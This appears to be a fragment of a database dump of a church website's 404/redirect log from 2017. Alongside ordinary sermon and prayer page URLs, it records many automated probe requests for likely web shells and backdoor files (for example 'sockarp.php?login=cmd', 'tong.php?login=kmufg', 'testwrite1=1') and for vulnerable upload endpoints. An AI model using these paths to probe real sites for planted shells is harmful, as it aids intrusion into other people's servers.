(6708, 'https://lifeoasisinternationalchurch.org/tmp.php', NULL, '', '', 4, 0, '2017-09-26 20:05:51', '0000-00-00 00:00:00', 301),
(6709, 'https://lifeoasisinternationalchurch.org/path4.php?testwrite1=1', NULL, '', '', 4, 0, '2017-09-27 01:53:05', '0000-00-00 00:00:00', 301),
(6710, 'https://lifeoasisinternationalchurch.org/wp-feed.php', NULL, 'lifeoasisinternationalchurch.org', '', 11, 0, '2017-09-27 01:59:54', '0000-00-00 00:00:00', 301),
(6711, 'https://www.lifeoasisinternationalchurch.org/index.php/63-2014-10', NULL, '', '', 26, 0, '2017-09-27 07:19:09', '0000-00-00 00:00:00', 301),
(6712, 'https://www.lifeoasisinternationalchurch.org/index.php/60-prophetic-words-for-day-1', NULL, '', '', 29, 0, '2017-09-27 07:20:04', '0000-00-00 00:00:00', 301),
(6713, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/18-prayer-a-fasting-day-10', NULL, '', '', 14, 0, '2017-09-27 07:20:15', '0000-00-00 00:00:00', 301),
(6714, 'https://www.lifeoasisinternationalchurch.org/wp-content/themes/organizer/lib_upload/server/php/', NULL, 'http://www.lifeoasisinternationalchurch.org/wp-content/themes/organizer/lib_upload/server/php/', '', 1, 0, '2017-09-27 09:58:27', '0000-00-00 00:00:00', 301),
(6715, 'https://www.lifeoasisinternationalchurch.org/resources/blog/item/', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 4, 0, '2017-09-27 19:07:34', '0000-00-00 00:00:00', 301),
(6716, 'https://lifeoasisinternationalchurch.org/xmlrpc-activate.php', NULL, '', '', 4, 0, '2017-09-28 00:37:07', '0000-00-00 00:00:00', 301),
(6717, 'https://lifeoasisinternationalchurch.org/index.php?option=com_k2&amp;view=itemlist&amp;itemid=622&amp;month=8&amp;year=2017&amp;task=calendar', NULL, '', '', 1, 0, '2017-09-28 05:12:28', '0000-00-00 00:00:00', 301),
(6718, 'https://lifeoasisinternationalchurch.org/index.php?option=com_k2&amp;view=itemlist&amp;itemid=622&amp;month=10&amp;year=2017&amp;task=calendar', NULL, '', '', 2, 0, '2017-09-28 05:12:28', '0000-00-00 00:00:00', 301),
(6719, 'https://lifeoasisinternationalchurch.org/infos.php', NULL, '', '', 4, 0, '2017-09-28 11:32:51', '0000-00-00 00:00:00', 301),
(6720, 'https://lifeoasisinternationalchurch.org/google.php', NULL, '', '', 5, 0, '2017-09-28 14:13:48', '0000-00-00 00:00:00', 301),
(6721, 'https://lifeoasisinternationalchurch.org/adoni.php', NULL, '', '', 3, 0, '2017-09-28 22:26:39', '0000-00-00 00:00:00', 301),
(6722, 'https://lifeoasisinternationalchurch.org/index.php/component/content/article/18-wifi-zion/35-female-gospel-minister-s-outline', NULL, '', '', 13, 0, '2017-09-29 01:26:43', '0000-00-00 00:00:00', 301),
(6723, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/7', NULL, '', '', 8, 0, '2017-09-29 02:06:13', '0000-00-00 00:00:00', 301),
(6724, 'https://www.lifeoasisinternationalchurch.org/component/content/article/18-loic/35-trm', NULL, '', '', 6, 0, '2017-09-29 02:06:28', '0000-00-00 00:00:00', 301),
(6725, 'https://www.lifeoasisinternationalchurch.org/loic/dailyreading.php', NULL, '', '', 9, 0, '2017-09-29 02:07:09', '0000-00-00 00:00:00', 301),
(6726, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_adsmanager&task=upload&tmpl=component', NULL, 'http://www.lifeoasisinternationalchurch.org/index.php?option=com_adsmanager&task=upload&tmpl=component', '', 4, 0, '2017-09-29 02:24:55', '0000-00-00 00:00:00', 301),
(6727, 'https://www.lifeoasisinternationalchurch.org/videos/18-loic/50-young-achievers', NULL, '', '', 7, 0, '2017-09-29 09:32:40', '0000-00-00 00:00:00', 301),
(6728, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/11-grace-3', NULL, '', '', 12, 0, '2017-09-29 09:59:39', '0000-00-00 00:00:00', 301),
(6729, 'https://lifeoasisinternationalchurch.org/wp-mosx.php?x=1', NULL, '', '', 2, 0, '2017-09-29 12:34:04', '0000-00-00 00:00:00', 301),
(6730, 'https://lifeoasisinternationalchurch.org/template-info-2/our-belief/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-09-29 18:56:41', '0000-00-00 00:00:00', 301),
(6731, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/6-dark-side-of-the-anointing-4', NULL, '', '', 9, 0, '2017-09-29 20:03:25', '0000-00-00 00:00:00', 301),
(6732, 'https://www.lifeoasisinternationalchurch.org/resources/training', NULL, '', '', 15, 0, '2017-09-29 23:02:16', '0000-00-00 00:00:00', 301),
(6733, 'https://lifeoasisinternationalchurch.org/ministries/outreach/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-09-30 17:42:22', '0000-00-00 00:00:00', 301),
(6734, 'https://lifeoasisinternationalchurch.org/cachee.php', NULL, '', '', 3, 0, '2017-09-30 19:28:44', '0000-00-00 00:00:00', 301),
(6735, 'https://lifeoasisinternationalchurch.org/options.php', NULL, '', '', 8, 0, '2017-10-01 00:57:19', '0000-00-00 00:00:00', 301),
(6736, 'https://lifeoasisinternationalchurch.org/sockarp.php?login=cmd', NULL, '', '', 4, 0, '2017-10-01 06:35:39', '0000-00-00 00:00:00', 301),
(6737, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/21-dealing-with-buts-in-your-life', NULL, '', '', 4, 0, '2017-10-01 06:43:04', '0000-00-00 00:00:00', 301),
(6738, 'https://www.lifeoasisinternationalchurch.org/s', NULL, '', '', 14, 0, '2017-10-01 07:20:03', '0000-00-00 00:00:00', 301),
(6739, 'https://www.lifeoasisinternationalchurch.org/st', NULL, '', '', 33, 0, '2017-10-01 07:20:14', '0000-00-00 00:00:00', 301),
(6740, 'https://www.lifeoasisinternationalchurch.org/streamib', NULL, '', '', 1, 0, '2017-10-01 07:20:15', '0000-00-00 00:00:00', 301),
(6741, 'https://www.lifeoasisinternationalchurch.org/str', NULL, '', '', 25, 0, '2017-10-01 07:20:15', '0000-00-00 00:00:00', 301),
(6742, 'https://www.lifeoasisinternationalchurch.org/streamibg', NULL, '', '', 1, 0, '2017-10-01 07:20:15', '0000-00-00 00:00:00', 301),
(6743, 'https://www.lifeoasisinternationalchurch.org/streami', NULL, '', '', 16, 0, '2017-10-01 07:20:16', '0000-00-00 00:00:00', 301),
(6744, 'https://www.lifeoasisinternationalchurch.org/7-kindom-builder/17-prayer-a-fasting-day-8', NULL, '', '', 4, 0, '2017-10-01 12:48:11', '0000-00-00 00:00:00', 301),
(6745, 'https://www.lifeoasisinternationalchurch.org/prayer/138-2014-9?tmpl=component&print=1&layout=default&page=', NULL, '', '', 2, 0, '2017-10-01 13:07:50', '0000-00-00 00:00:00', 301),
(6746, 'https://lifeoasisinternationalchurch.org/>', NULL, '', '', 3, 0, '2017-10-01 19:08:12', '0000-00-00 00:00:00', 301),
(6747, 'https://www.lifeoasisinternationalchurch.org/loic/mediaoutreach.php', NULL, 'http://www.lifeoasisinternationalchurch.org/loic/mediaoutreach.php', '', 10, 0, '2017-10-01 19:40:35', '0000-00-00 00:00:00', 301),
(6748, 'https://lifeoasisinternationalchurch.org/index.php/272-day-12-of-21-days-fasting-and-prayer-november', NULL, '', '', 12, 0, '2017-10-01 20:06:43', '0000-00-00 00:00:00', 301),
(6749, 'https://lifeoasisinternationalchurch.org/studycentre', NULL, '', '', 24, 0, '2017-10-01 23:10:50', '0000-00-00 00:00:00', 301),
(6750, 'https://lifeoasisinternationalchurch.org/iontrol.php', NULL, 'lifeoasisinternationalchurch.org', '', 4, 0, '2017-10-02 04:23:15', '0000-00-00 00:00:00', 301),
(6751, 'https://lifeoasisinternationalchurch.org/wp-check.php', NULL, 'lifeoasisinternationalchurch.org', '', 5, 0, '2017-10-02 04:26:37', '0000-00-00 00:00:00', 301),
(6752, 'https://lifeoasisinternationalchurch.org/wp_honor.php', NULL, 'lifeoasisinternationalchurch.org', '', 5, 0, '2017-10-02 04:26:46', '0000-00-00 00:00:00', 301),
(6753, 'https://lifeoasisinternationalchurch.org/tobey.php', NULL, 'lifeoasisinternationalchurch.org', '', 5, 0, '2017-10-02 04:27:41', '0000-00-00 00:00:00', 301),
(6754, 'https://lifeoasisinternationalchurch.org/maps.php', NULL, 'lifeoasisinternationalchurch.org', '', 8, 0, '2017-10-02 04:27:49', '0000-00-00 00:00:00', 301),
(6755, 'https://lifeoasisinternationalchurch.org/upgrade.php', NULL, 'lifeoasisinternationalchurch.org', '', 7, 0, '2017-10-02 04:30:44', '0000-00-00 00:00:00', 301),
(6756, 'https://lifeoasisinternationalchurch.org/keith.php', NULL, 'lifeoasisinternationalchurch.org', '', 6, 0, '2017-10-02 04:32:15', '0000-00-00 00:00:00', 301),
(6757, 'https://lifeoasisinternationalchurch.org/wp-cokd.php', NULL, 'lifeoasisinternationalchurch.org', '', 6, 0, '2017-10-02 04:32:42', '0000-00-00 00:00:00', 301),
(6758, 'https://lifeoasisinternationalchurch.org/news.php', NULL, 'lifeoasisinternationalchurch.org', '', 6, 0, '2017-10-02 04:33:28', '0000-00-00 00:00:00', 301),
(6759, 'https://lifeoasisinternationalchurch.org/functions.php', NULL, 'lifeoasisinternationalchurch.org', '', 3, 0, '2017-10-02 04:34:14', '0000-00-00 00:00:00', 301),
(6760, 'https://lifeoasisinternationalchurch.org/wp-tmp.php', NULL, 'lifeoasisinternationalchurch.org', '', 7, 0, '2017-10-02 04:34:35', '0000-00-00 00:00:00', 301),
(6761, 'https://lifeoasisinternationalchurch.org/sqlibak.php', NULL, 'lifeoasisinternationalchurch.org', '', 5, 0, '2017-10-02 04:35:44', '0000-00-00 00:00:00', 301),
(6762, 'https://lifeoasisinternationalchurch.org/tong.php?login=kmufg', NULL, 'lifeoasisinternationalchurch.org', '', 5, 0, '2017-10-02 04:37:20', '0000-00-00 00:00:00', 301),
(6763, 'https://lifeoasisinternationalchurch.org/reade.php', NULL, 'lifeoasisinternationalchurch.org', '', 8, 0, '2017-10-02 04:38:20', '0000-00-00 00:00:00', 301),
(6764, 'https://lifeoasisinternationalchurch.org/wp-sbb.php', NULL, '', '', 4, 0, '2017-10-02 05:01:50', '0000-00-00 00:00:00', 301),
(6765, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/21-dealing-with-buts-in-your-life', NULL, '', '', 47, 0, '2017-10-02 05:23:27', '0000-00-00 00:00:00', 301),
(6766, 'https://www.lifeoasisinternationalchurch.org/prayer/161-day222014-5?tmpl=component&print=1&layout=default&page=', NULL, '', '', 2, 0, '2017-10-02 07:28:31', '0000-00-00 00:00:00', 301),
(6767, 'https://lifeoasisinternationalchurch.org/wp-cros.php', NULL, '', '', 4, 0, '2017-10-02 10:54:21', '0000-00-00 00:00:00', 301),
(6768, 'https://lifeoasisinternationalchurch.org/newsite', NULL, '', '', 1, 0, '2017-10-02 11:17:26', '0000-00-00 00:00:00', 301),
(6769, 'https://lifeoasisinternationalchurch.org/news', NULL, '', '', 1, 0, '2017-10-02 11:23:21', '0000-00-00 00:00:00', 301),
(6770, 'https://lifeoasisinternationalchurch.org/search.php', NULL, 'lifeoasisinternationalchurch.org', '', 8, 0, '2017-10-02 15:45:51', '0000-00-00 00:00:00', 301),
(6771, 'https://lifeoasisinternationalchurch.org/forum.php', NULL, '', '', 8, 0, '2017-10-02 15:59:53', '0000-00-00 00:00:00', 301),
(6772, 'https://lifeoasisinternationalchurch.org/hivcxa.php', NULL, 'lifeoasisinternationalchurch.org', '', 7, 0, '2017-10-02 16:11:41', '0000-00-00 00:00:00', 301),
(6773, 'https://lifeoasisinternationalchurch.org/yjh.php', NULL, 'lifeoasisinternationalchurch.org', '', 7, 0, '2017-10-02 16:34:40', '0000-00-00 00:00:00', 301),
(6774, 'https://lifeoasisinternationalchurch.org/branches_', NULL, '', '', 4, 0, '2017-10-02 19:51:31', '0000-00-00 00:00:00', 301),
(6775, 'https://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/10', NULL, '', '', 2, 0, '2017-10-02 20:53:18', '0000-00-00 00:00:00', 301),
(6776, 'https://lifeoasisinternationalchurch.org/resources/broadcast-schedule_', NULL, '', '', 1, 0, '2017-10-02 20:58:32', '0000-00-00 00:00:00', 301),
(6777, 'https://www.lifeoasisinternationalchurch.org/index.php/programme/12-sample-content/', NULL, '', '', 2, 0, '2017-10-03 04:47:42', '0000-00-00 00:00:00', 301),
(6778, 'https://lifeoasisinternationalchurch.org/configss.php?check=1', NULL, '', '', 2, 0, '2017-10-03 09:06:18', '0000-00-00 00:00:00', 301),
(6779, 'https://api.nike.comhttps//api.nike.com/launch/launch_views/v2/?filter=productid(52e6f428-cdab-58da-b43a-91d924974cfc)', NULL, 'https://www.nike.com/cn/launch/t/flyknit-trainer-citron', '', 1, 0, '2017-10-03 13:19:53', '0000-00-00 00:00:00', 301),
(6780, 'https://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/19-prayer-a-fasting-day-10', NULL, '', '', 2, 0, '2017-10-03 14:00:04', '0000-00-00 00:00:00', 301),
(6781, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/holy%20spirit', NULL, '', '', 6, 0, '2017-10-03 15:45:23', '0000-00-00 00:00:00', 301),
(6782, 'https://lifeoasisinternationalchurch.org/phqmv.php', NULL, '', '', 3, 0, '2017-10-03 15:55:45', '0000-00-00 00:00:00', 301),
(6783, 'https://lifeoasisinternationalchurch.org/wow2017/', NULL, 'https://lifeoasisinternationalchurch.org/wow2017/administrator/index.php?option=com_vikevents&task=edititem&cid[]=1', '', 43, 0, '2017-10-03 16:10:30', '0000-00-00 00:00:00', 301),
(6784, 'https://lifeoasisinternationalchurch.org/wow2017/index.php?task=confirmreservation', NULL, 'https://lifeoasisinternationalchurch.org/40thawc/', '', 1, 0, '2017-10-03 16:11:04', '0000-00-00 00:00:00', 301),
(6785, 'https://www.lifeoasisinternationalchurch.org/resources/livestream1', NULL, '', '', 5, 0, '2017-10-03 21:55:47', '0000-00-00 00:00:00', 301),
(6786, 'https://lifeoasisinternationalchurch.org/index.php/239-2016-day-22', NULL, '', '', 12, 0, '2017-10-03 23:17:24', '0000-00-00 00:00:00', 301),
(6787, 'https://www.lifeoasisinternationalchurch.org/accordion-a/level-22', NULL, '', '', 8, 0, '2017-10-03 23:39:01', '0000-00-00 00:00:00', 301),
(6788, 'https://www.lifeoasisinternationalchurch.org/accordion-b/level-21', NULL, '', '', 6, 0, '2017-10-03 23:40:43', '0000-00-00 00:00:00', 301),
(6789, 'https://www.lifeoasisinternationalchurch.org/sample-levels/level-22', NULL, '', '', 4, 0, '2017-10-03 23:41:20', '0000-00-00 00:00:00', 301),
(6790, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/last%20days', NULL, '', '', 7, 0, '2017-10-03 23:58:53', '0000-00-00 00:00:00', 301),
(6791, 'https://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/', NULL, '', '', 11, 0, '2017-10-04 01:23:56', '0000-00-00 00:00:00', 301),
(6792, 'https://lifeoasisinternationalchurch.org/index.php/271-day-11-of-21-days-fasting-and-prayer-november', NULL, '', '', 11, 0, '2017-10-04 02:42:51', '0000-00-00 00:00:00', 301),
(6793, 'https://lifeoasisinternationalchurch.org/index.php/224-2016-day-7', NULL, '', '', 12, 0, '2017-10-04 04:49:52', '0000-00-00 00:00:00', 301),
(6794, 'https://lifeoasisinternationalchurch.org/component/k2/itemlist/tag/correct%20christian', NULL, '', '', 7, 0, '2017-10-04 08:25:14', '0000-00-00 00:00:00', 301),
(6795, 'https://lifeoasisinternationalchurch.org/marvin.php', NULL, '', '', 1, 0, '2017-10-04 11:47:48', '0000-00-00 00:00:00', 301),
(6796, 'https://www.lifeoasisinternationalchurch.org/2-uncategorised/47-videos', NULL, '', '', 8, 0, '2017-10-04 15:31:16', '0000-00-00 00:00:00', 301),
(6797, 'https://www.lifeoasisinternationalchurch.org/sample-levels/level-21', NULL, '', '', 5, 0, '2017-10-04 15:33:46', '0000-00-00 00:00:00', 301),
(6798, 'https://lifeoasisinternationalchurch.org/wp-print.php?script=1', NULL, '', '', 4, 0, '2017-10-04 22:29:48', '0000-00-00 00:00:00', 301),
(6799, 'https://lifeoasisinternationalchurch.org/meniacle/wp-blog-header.php', NULL, '', '', 4, 0, '2017-10-05 01:53:43', '0000-00-00 00:00:00', 301),
(6800, 'https://www.lifeoasisinternationalchurch.org/wow2017/index.php/component/users/?view=remind', NULL, 'https://www.lifeoasisinternationalchurch.org/', '', 6, 0, '2017-10-05 11:03:50', '0000-00-00 00:00:00', 301),
(6801, 'https://www.lifeoasisinternationalchurch.org/wow2017/', NULL, '', '', 131, 0, '2017-10-05 11:42:38', '0000-00-00 00:00:00', 301),
(6802, 'https://lifeoasisinternationalchurch.org/comments.php', NULL, '', '', 3, 0, '2017-10-05 12:52:07', '0000-00-00 00:00:00', 301),
(6803, 'https://lifeoasisinternationalchurch.org/codules.php', NULL, '', '', 3, 0, '2017-10-05 15:31:15', '0000-00-00 00:00:00', 301),
(6804, 'https://lifeoasisinternationalchurch.org/index.php/265-day-5-of-21-days-fasting-and-prayer-november', NULL, '', '', 11, 0, '2017-10-05 16:35:28', '0000-00-00 00:00:00', 301),
(6805, 'https://www.lifeoasisinternationalchurch.org/steaming', NULL, '', '', 5, 0, '2017-10-05 22:53:40', '0000-00-00 00:00:00', 301),
(6806, 'https://lifeoasisinternationalchurch.org/component/jcomments/captcha/88595', NULL, '', '', 1, 0, '2017-10-06 02:29:09', '0000-00-00 00:00:00', 301),
(6807, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/3-rev-mrs-oyenike-areogun', NULL, '', '', 9, 0, '2017-10-06 05:13:13', '0000-00-00 00:00:00', 301),
(6808, 'https://lifeoasisinternationalchurch.org/indax.php', NULL, '', '', 4, 0, '2017-10-06 07:12:26', '0000-00-00 00:00:00', 301),
(6809, 'https://lifeoasisinternationalchurch.org/wp-index.php', NULL, '', '', 4, 0, '2017-10-06 09:49:07', '0000-00-00 00:00:00', 301),
(6810, 'https://lifeoasisinternationalchurch.org/awc2017', NULL, '', '', 3, 0, '2017-10-06 10:35:48', '0000-00-00 00:00:00', 301),
(6811, 'https://lifeoasisinternationalchurch.org/2017awc', NULL, '', '', 1, 0, '2017-10-06 10:36:07', '0000-00-00 00:00:00', 301),
(6812, 'https://www.lifeoasisinternationalchurch.org/archive/index.php', NULL, 'https://www.lifeoasisinternationalchurch.org/archive/index.php', '', 1, 0, '2017-10-06 14:14:28', '0000-00-00 00:00:00', 301),
(6813, 'https://www.lifeoasisinternationalchurch.org/11-demo-articles/54-slide-04', NULL, '', '', 3, 0, '2017-10-06 15:00:18', '0000-00-00 00:00:00', 301),
(6814, 'https://lifeoasisinternationalchurch.org/home.bak.php', NULL, '', '', 3, 0, '2017-10-06 15:19:16', '0000-00-00 00:00:00', 301),
(6815, 'https://www.lifeoasisinternationalchurch.org/feedback.php', NULL, '', '', 36, 0, '2017-10-06 18:15:28', '0000-00-00 00:00:00', 301),
(6816, 'https://www.lifeoasisinternationalchurch.org/ministries/books/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-10-06 20:03:11', '0000-00-00 00:00:00', 301),
(6817, 'https://lifeoasisinternationalchurch.org/backups.php?mode=config&key=c6y1f2ea7217pbtl1flch98sopfo/r1z76/okfae', NULL, '', '', 5, 0, '2017-10-06 23:52:13', '0000-00-00 00:00:00', 301),
(6818, 'https://www.lifeoasisinternationalchurch.org/wow2017', NULL, '', '', 130, 0, '2017-10-07 15:32:22', '0000-00-00 00:00:00', 301),
(6819, 'https://www.lifeoasisinternationalchurch.org/60-day8', NULL, '', '', 7, 0, '2017-10-07 16:47:32', '0000-00-00 00:00:00', 301),
(6820, 'https://unite.nike.comhttps//unite.nike.com/loginwithsetcookie?appversion=315&experienceversion=276&uxid=com.nike.commerce.snkrs.web&locale=zh_cn&backendenvironment=identity&browser=google inc.&os=undefined&mobile=false&native=false&visit=1&visitor=ae1c713a-b9e0-4f44-bdfe-df2891d2d3e9&lifetime=session', NULL, 'https://www.nike.com/cn/launch/t/nikecourt-zoom-vapor-rf-aj3-atmos', '', 1, 0, '2017-10-07 20:57:40', '0000-00-00 00:00:00', 301),
(6821, 'https://lifeoasisinternationalchurch.org/18-loic/35-trm?tmpl=component&print=1&page=', NULL, '', '', 1, 0, '2017-10-07 21:31:24', '0000-00-00 00:00:00', 301),
(6822, 'https://www.lifeoasisinternationalchurch.org/index.php/component/content/article/18-loic/50-young-achievers', NULL, '', '', 9, 0, '2017-10-07 22:39:59', '0000-00-00 00:00:00', 301),
(6823, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/12-manifesting-spiritual-gifts', NULL, '', '', 21, 0, '2017-10-08 02:34:15', '0000-00-00 00:00:00', 301),
(6824, 'https://www.lifeoasisinternationalchurch.org/wow2017/index.php', NULL, '', '', 109, 0, '2017-10-08 03:17:47', '0000-00-00 00:00:00', 301),
(6825, 'https://www.lifeoasisinternationalchurch.org/resources/french/18-loic/50-young-achievers', NULL, '', '', 10, 0, '2017-10-08 03:42:42', '0000-00-00 00:00:00', 301),
(6826, 'https://www.lifeoasisinternationalchurch.org/private/streaming', NULL, '', '', 4, 0, '2017-10-08 06:37:45', '0000-00-00 00:00:00', 301),
(6827, 'https://www.lifeoasisinternationalchurch.org/component/content/article/12-sample-content/19-sample-content-8', NULL, 'android-app://com.google.android.googlequicksearchbox', '', 5, 0, '2017-10-08 12:38:29', '0000-00-00 00:00:00', 301),
(6828, 'https://lifeoasisinternationalchurch.org/55-day1', NULL, '', '', 4, 0, '2017-10-08 14:08:48', '0000-00-00 00:00:00', 301),
(6829, 'https://lifeoasisinternationalchurch.org/mobile_detect.php', NULL, '', '', 5, 0, '2017-10-08 14:56:22', '0000-00-00 00:00:00', 301),
(6830, 'https://lifeoasisinternationalchurch.org/feeder/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/feeder/popup-pomo.php', '', 4, 0, '2017-10-08 15:36:22', '0000-00-00 00:00:00', 301),
(6831, 'https://lifeoasisinternationalchurch.org/gtde.php', NULL, '', '', 6, 0, '2017-10-08 17:43:35', '0000-00-00 00:00:00', 301),
(6832, 'https://lifeoasisinternationalchurch.org/revision/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/revision/popup-pomo.php', '', 9, 0, '2017-10-08 22:42:57', '0000-00-00 00:00:00', 301),
(6833, 'https://lifeoasisinternationalchurch.org/setupconfig/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/setupconfig/popup-pomo.php', '', 12, 0, '2017-10-08 23:02:02', '0000-00-00 00:00:00', 301),
(6834, 'https://lifeoasisinternationalchurch.org/setupconfig/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/setupconfig/popup-pomo.php', '', 1, 0, '2017-10-08 23:02:03', '0000-00-00 00:00:00', 301),
(6835, 'https://lifeoasisinternationalchurch.org/permalink/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/permalink/popup-pomo.php', '', 20, 0, '2017-10-09 01:52:13', '0000-00-00 00:00:00', 301),
(6836, 'https://lifeoasisinternationalchurch.org/view.php?check=1', NULL, '', '', 4, 0, '2017-10-09 02:14:07', '0000-00-00 00:00:00', 301),
(6837, 'https://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/47-prayer-a-fasting-day-38', NULL, '', '', 3, 0, '2017-10-09 04:49:09', '0000-00-00 00:00:00', 301),
(6838, 'https://server.lifeoasisinternationalchurch.org/sdk', NULL, '', '', 4, 0, '2017-10-09 06:55:35', '0000-00-00 00:00:00', 301),
(6839, 'https://lifeoasisinternationalchurch.org/styles.js.php', NULL, 'lifeoasisinternationalchurch.org', '', 2, 0, '2017-10-09 08:41:02', '0000-00-00 00:00:00', 301),
(6840, 'https://lifeoasisinternationalchurch.org/martina.php', NULL, '', '', 4, 0, '2017-10-09 10:22:05', '0000-00-00 00:00:00', 301),
(6841, 'https://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/19', NULL, '', '', 2, 0, '2017-10-09 10:37:08', '0000-00-00 00:00:00', 301),
(6842, 'https://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/41-prayer-a-fasting-day-32', NULL, '', '', 2, 0, '2017-10-09 12:18:16', '0000-00-00 00:00:00', 301),
(6843, 'https://lifeoasisinternationalchurch.org/trackback.php', NULL, '', '', 4, 0, '2017-10-09 12:58:39', '0000-00-00 00:00:00', 301),
(6844, 'https://lifeoasisinternationalchurch.org/sandy/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/sandy/popup-pomo.php', '', 1, 0, '2017-10-09 15:22:20', '0000-00-00 00:00:00', 301),
(6845, 'https://lifeoasisinternationalchurch.org/random.php', NULL, '', '', 6, 0, '2017-10-09 15:42:02', '0000-00-00 00:00:00', 301),
(6846, 'https://lifeoasisinternationalchurch.org/fx2.php', NULL, 'http://lifeoasisinternationalchurch.org/fx2.php', '', 1, 0, '2017-10-09 16:17:48', '0000-00-00 00:00:00', 301),
(6847, 'https://lifeoasisinternationalchurch.org/pols.php', NULL, '', '', 4, 0, '2017-10-09 18:21:24', '0000-00-00 00:00:00', 301),
(6848, 'https://www.lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/3', NULL, '', '', 2, 0, '2017-10-09 20:34:19', '0000-00-00 00:00:00', 301),
(6849, 'https://lifeoasisinternationalchurch.org/11.php', NULL, '', '', 7, 0, '2017-10-09 23:30:40', '0000-00-00 00:00:00', 301),
(6850, 'https://lifeoasisinternationalchurch.org/lsn_an.php', NULL, 'http://lifeoasisinternationalchurch.org/lsn_an.php', '', 8, 0, '2017-10-10 02:19:55', '0000-00-00 00:00:00', 301),
(6851, 'https://www.lifeoasisinternationalchurch.org/component/content/article/12-sample-content/18-sample-content-7', NULL, '', '', 2, 0, '2017-10-10 03:10:23', '0000-00-00 00:00:00', 301),
(6852, 'https://lifeoasisinternationalchurch.org/wp-blog-config.php', NULL, '', '', 4, 0, '2017-10-10 07:23:29', '0000-00-00 00:00:00', 301),
(6853, 'https://lifeoasisinternationalchurch.org/index.php?option=com_community&view=frontpage', NULL, '', '', 1, 0, '2017-10-10 12:51:59', '0000-00-00 00:00:00', 301),
(6854, 'https://lifeoasisinternationalchurch.org/maill.php', NULL, '', '', 4, 0, '2017-10-10 15:12:19', '0000-00-00 00:00:00', 301),
(6855, 'https://lifeoasisinternationalchurch.org/wow2017/index.php?option=com_vikevents&task=orders&oid=190&scode=463_1503164346_42', NULL, '', '', 1, 0, '2017-10-10 15:17:39', '0000-00-00 00:00:00', 301),
(6856, 'https://www.lifeoasisinternationalchurch.org/accordion-a/level-21', NULL, '', '', 6, 0, '2017-10-10 15:27:28', '0000-00-00 00:00:00', 301),
(6857, 'https://lifeoasisinternationalchurch.org/wow2017/administrator', NULL, '', '', 2, 0, '2017-10-10 15:56:41', '0000-00-00 00:00:00', 301),
(6858, 'https://lifeoasisinternationalchurch.org/styah', NULL, '', '', 2, 0, '2017-10-10 19:27:04', '0000-00-00 00:00:00', 301),
(6859, 'https://lifeoasisinternationalchurch.org/index.php/60-prophetic-words-for-day-1', NULL, '', '', 5, 0, '2017-10-10 20:58:43', '0000-00-00 00:00:00', 301),
(6860, 'https://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/10-prayer-a-fasting-day-1', NULL, '', '', 2, 0, '2017-10-10 23:48:48', '0000-00-00 00:00:00', 301),
(6861, 'https://lifeoasisinternationalchurch.org/marvins.php', NULL, 'http://lifeoasisinternationalchurch.org/marvins.php', '', 6, 0, '2017-10-11 01:08:54', '0000-00-00 00:00:00', 301),
(6862, 'https://lifeoasisinternationalchurch.org/wp-logs.php?action=test', NULL, '', '', 7, 0, '2017-10-11 07:23:25', '0000-00-00 00:00:00', 301),
(6863, 'https://lifeoasisinternationalchurch.org/mp3-messages/sermon/15-entering-into-winning-position-3', NULL, '', '', 3, 0, '2017-10-11 12:22:30', '0000-00-00 00:00:00', 301),
(6864, 'https://www.lifeoasisinternationalchurch.org/hidden-stream', NULL, '', '', 13, 0, '2017-10-11 16:20:53', '0000-00-00 00:00:00', 301),
(6865, 'https://lifeoasisinternationalchurch.org/tmp/krd.php', NULL, '', '', 1, 0, '2017-10-11 19:43:48', '0000-00-00 00:00:00', 301),
(6866, 'https://lifeoasisinternationalchurch.org/skin/signedint.php', NULL, '', '', 1, 0, '2017-10-11 20:24:33', '0000-00-00 00:00:00', 301),
(6867, 'https://www.lifeoasisinternationalchurch.org/resources/iradio', NULL, '', '', 7, 0, '2017-10-11 22:12:39', '0000-00-00 00:00:00', 301),
(6868, 'https://lifeoasisinternationalchurch.org/parseopmla/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/parseopmla/popup-pomo.php', '', 9, 0, '2017-10-11 22:26:06', '0000-00-00 00:00:00', 301),
(6869, 'https://lifeoasisinternationalchurch.org/index.php/250-day-15-of-21-days-fasting-and-prayer-october', NULL, '', '', 8, 0, '2017-10-12 00:34:05', '0000-00-00 00:00:00', 301),
(6870, 'https://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/16-prayer-a-fasting-day-7', NULL, '', '', 8, 0, '2017-10-12 00:38:45', '0000-00-00 00:00:00', 301),
(6871, 'https://lifeoasisinternationalchurch.org/rjsbgd.php', NULL, 'http://lifeoasisinternationalchurch.org/rjsbgd.php', '', 2, 0, '2017-10-12 00:57:01', '0000-00-00 00:00:00', 301),
